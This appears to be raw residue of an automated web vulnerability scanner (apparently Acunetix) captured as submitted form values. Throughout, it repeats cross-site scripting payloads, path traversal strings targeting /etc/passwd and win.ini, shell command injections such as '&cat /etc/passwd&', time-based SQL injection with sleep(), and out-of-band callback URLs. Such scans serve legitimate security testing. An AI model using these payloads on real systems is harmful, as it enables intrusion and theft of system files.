1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983628></ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt >prompt(978166)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(907186)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932652)"></g></svg>

1

1

response.write(9651234*9881526)

1

1

1<div style=width:expression(prompt(908121))>

1

'+response.write(9651234*9881526)+'

&cat /etc/passwd&

1

1

WEB-INF/web.xml

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"+response.write(9651234*9881526)+"

1

'&cat /etc/passwd&'

1

WEB-INF\web.xml

1<body onload=prompt(903684)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

"&cat /etc/passwd&"

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942791)>

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(944293)>

1

-1)

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

1

${99520+99734}

1<img/src=">" onerror=alert(938699)>

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1<ScRiPt%20>prompt(957348)</sCripT>

1&n965334=v903936

PI4Ydm13'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

)

1

1&lt

7POYDrEb')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

!(()&&!|*|*|

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

\xf6<img acu onmouseover=prompt(978497) //\xf6>

u1Ltq8om'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'

1

1

1<input autofocus onfocus=prompt(923675)>

-1

/etc/passwd

1

1

1

"

'

1

1

<a href='http://www.acunetix.com'>website security</a>

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

${@print(md5(acunetix_wvs_security_test))}

http://hitKcHXdgT6Pq.bxss.me/

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

comments

1_MI4us <ScRiPt >prompt(971008)</ScRiPt>

1

1

MfE2gu4f'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Cjg5Hxek')

http://www.acunetix.tst

1

1

1

'&dir&'

1

comments/.

1

rPw2YDwC'))

1

1

1

'"

file:///etc/passwd

"&dir&"

1

1

1'"()&%<ScRiPt >prompt(904388)</ScRiPt>

1

1

1

<!--

/\../\../\../\../\../\../\../etc/passwd

|dir

1

'"()&%<ScRiPt >prompt(986288)</ScRiPt>

1

1

1

1

1

WEB-INF/web.xml

1

'|dir

1_984450

1

1

1

"|dir

1

1

WEB-INF\web.xml

acu8987\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8987

1

1

1

1

../../../../../../../../../../windows/win.ini

acux2585\xc0\xbez1\xc0\xbcz2a\x90bcxuca2585

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(992856)</ScRiPt>

1

1

1

1<script>prompt(948597)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(955156)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969131></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(989700)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(965381)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907138)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(964999))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

1

1<body onload=prompt(922408)>

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942594)>

1

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(979079)>

1

1

1<img/src=">" onerror=alert(920874)>

1

1

1<ScRiPt%20>prompt(905714)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(903238) //\xf6>

1

1

1<input autofocus onfocus=prompt(959996)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_NLbi0 <ScRiPt >prompt(991553)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9793239*9015120)

1

1

1

'+response.write(9793239*9015120)+'

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"+response.write(9793239*9015120)+"

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

-1

1

1

1

cat /etc/passwd

${100293+99514}

../../../../../../../../../../etc/passwd.jpg

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

`cat /etc/passwd`

1

-1))

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n907704=v936249

|cat /etc/passwd#

tmzdlB9K'

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'|'ld

xnfmSPFi')

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

testasp.vulnweb.com

B5yfViaL'))

^(#$!@#$)(()))******

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

1

1

1

'

/etc/passwd

-1)

1

1

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

dW890VHv'

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitet927OMPXd.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

MD2vCy25')

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

g8WeLy8a'))

comments

1

&dir

1

1

http://www.acunetix.tst

1

'"

comments/.

file:///etc/passwd

1'"()&%<ScRiPt >prompt(992409)</ScRiPt>

'&dir&'

1

1

<!--

1

1

'"()&%<ScRiPt >prompt(992626)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

1

1

1

WEB-INF/web.xml

1_961373

|dir

1

1

1

acu6053\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6053

WEB-INF\web.xml

1

'|dir

1

acux7055\xc0\xbez1\xc0\xbcz2a\x90bcxuca7055

1

"|dir

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(975801)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1

1<script>prompt(998951)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(925266)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995423></ScRiPt>

1

1

................windowswin.ini

1<ScRiPt >prompt(921110)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(992114)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906626)"></g></svg>

1

response.write(9152046*9367779)

1<div style=width:expression(prompt(916867))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9152046*9367779)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

"+response.write(9152046*9367779)+"

&cat /etc/passwd&

1

1<body onload=prompt(984343)>

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996515)>

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(937182)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

-1

1<img/src=">" onerror=alert(931389)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(976274)</sCripT>

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99046+100354}

1

1

1

|cat /etc/passwd#

1&lt

1

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

\xf6<img acu onmouseover=prompt(915878) //\xf6>

'|'ld

1&n986068=v970349

1some_inexistent_file_with_long_name%00.jpg

GO9V3AX1'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1<input autofocus onfocus=prompt(927514)>

"|"ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

KqYcbLi6')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

'"()

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

testasp.vulnweb.com

1FStOWUN'))

1

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

'

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

1

1

"

1_JCLXF <ScRiPt >prompt(996430)</ScRiPt>

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1)

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hitQBy8AdCgbY.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

-1))

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

comments

Gw8HMpgz'

1

1

'&dir&'

1

1

file:///etc/passwd

1

g3oAdI12')

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

"&dir&"

'"

1'"()&%<ScRiPt >prompt(975740)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

Jx54Nm1p'))

comments/.

1

|dir

1

'"()&%<ScRiPt >prompt(945816)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

'|dir

1_967883

WEB-INF\web.xml

1

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

acu5066\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5066

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acux8746\xc0\xbez1\xc0\xbcz2a\x90bcxuca8746

1

1

1

1

1

1<ScRiPt >prompt(926410)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(992663)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(971563)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?974253></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992972)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(986890)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922033)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9502373*9495775)

1<div style=width:expression(prompt(904289))>

1

1

1

'+response.write(9502373*9495775)+'

1<iframe src='data:text/html

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

"+response.write(9502373*9495775)+"

1<body onload=prompt(996404)>

WEB-INF\web.xml

1

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(953182)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(976597)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(951600)>

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${100470+100417}

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(917025)</sCripT>

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&n949231=v974181

|cat /etc/passwd#

1

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(926414) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

xlBMDtMR'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

testasp.vulnweb.com

'"()

1<input autofocus onfocus=prompt(930722)>

3hV2tLqx')

/etc/passwd

^(#$!@#$)(()))******

1

'

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

nPcjp82u'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

"

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

http://hitxLnnkYheW2.bxss.me/

"

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1_hvLyF <ScRiPt >prompt(931409)</ScRiPt>

1

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

http://www.acunetix.tst

sB69AhDI'

file:///etc/passwd

1

comments

'"

1

1

1

'&dir&'

1

RmYwpB0v')

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

1'"()&%<ScRiPt >prompt(920123)</ScRiPt>

1

"&dir&"

iEMYbSNA'))

1

WEB-INF/web.xml

<!--

'"()&%<ScRiPt >prompt(937503)</ScRiPt>

1

1

|dir

1

1

WEB-INF\web.xml

1

1_954528

1

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

1

acu4606\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4606

1

1

1

../../../../../../../../../../boot.ini

1

acux1402\xc0\xbez1\xc0\xbcz2a\x90bcxuca1402

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(932548)</ScRiPt>

1

1

1

1<script>prompt(973492)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(942382)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945869></ScRiPt>

1

1

1

1<ScRiPt >prompt(989440)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(960258)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910837)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<div style=width:expression(prompt(908038))>

response.write(9663966*9153022)

1

1

'+response.write(9663966*9153022)+'

1<iframe src='data:text/html

WEB-INF/web.xml

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

"+response.write(9663966*9153022)+"

1<body onload=prompt(994225)>

1

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996764)>

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(965540)>

1

-1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1

1

1<img/src=">" onerror=alert(940557)>

${100426+99977}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

1

1

1<ScRiPt%20>prompt(936477)</sCripT>

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

1

0AVYQS9n'

1&lt

1

1&n966897=v936684

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

1

1

kzT2HwyG')

\xf6<img acu onmouseover=prompt(965670) //\xf6>

testasp.vulnweb.com

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

9F5wsaoo'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(924336)>

'"()

1

/etc/passwd

1

'

-1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

"

1

-1)

1

1

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

acunetix_wvs_invalid_filename

-1))

1

http://hitpsiWQsnoMt.bxss.me/

1_HWAfr <ScRiPt >prompt(978994)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

comments

bm0mcZKe'

1

1

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

1

file:///etc/passwd

C10Ak6s1')

1

1

http://www.acunetix.tst

1

comments/.

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

wqbah2tT'))

'"

1

1'"()&%<ScRiPt >prompt(960948)</ScRiPt>

1

1

|dir

1

<!--

WEB-INF/web.xml

1

1

1

1

'|dir

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(992951)</ScRiPt>

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1_946583

1

1

1

1

../../../../../../../../../../boot.ini

acu8473\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8473

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux1984\xc0\xbez1\xc0\xbcz2a\x90bcxuca1984

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(979971)</ScRiPt>

1

1

1

................windowswin.ini

1

1<script>prompt(992012)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(972071)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975460></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(925395)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(994501)">

1

response.write(9600263*9403602)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905810)"></g></svg>

1

WEB-INF/web.xml

&cat /etc/passwd&

'+response.write(9600263*9403602)+'

1

1

1<div style=width:expression(prompt(909612))>

1

WEB-INF\web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

"+response.write(9600263*9403602)+"

1

1<iframe src='data:text/html

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(965805)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929029)>

1

-1

${99325+99950}

`cat /etc/passwd`

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(984369)>

1

-1)

1

|cat /etc/passwd#

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1<img/src=">" onerror=alert(993143)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n907728=v940390

1

'|'ld

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(952448)</sCripT>

f4yuRraC'

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

c0xUllmO')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

/etc/passwd

'"()

\xf6<img acu onmouseover=prompt(935688) //\xf6>

'

testasp.vulnweb.com

pPolulle'))

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(973727)>

"

1

1

-1

1

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

-1)

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

http://hit7Y61wv4T47.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

1_Ylg3N <ScRiPt >prompt(913506)</ScRiPt>

1

1

is7HpywJ'

comments

file:///etc/passwd

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

1

8M7LJpA9')

'"

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

"&dir&"

1

1

1

1

IlzdDYc2'))

1

<!--

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(903761)</ScRiPt>

|dir

1

1

1

1

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(980923)</ScRiPt>

'|dir

1

1

1

1

1

1_900954

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

1

1

../../../../../../../../../../boot.ini

1

acu3499\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3499

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6950\xc0\xbez1\xc0\xbcz2a\x90bcxuca6950

1

1

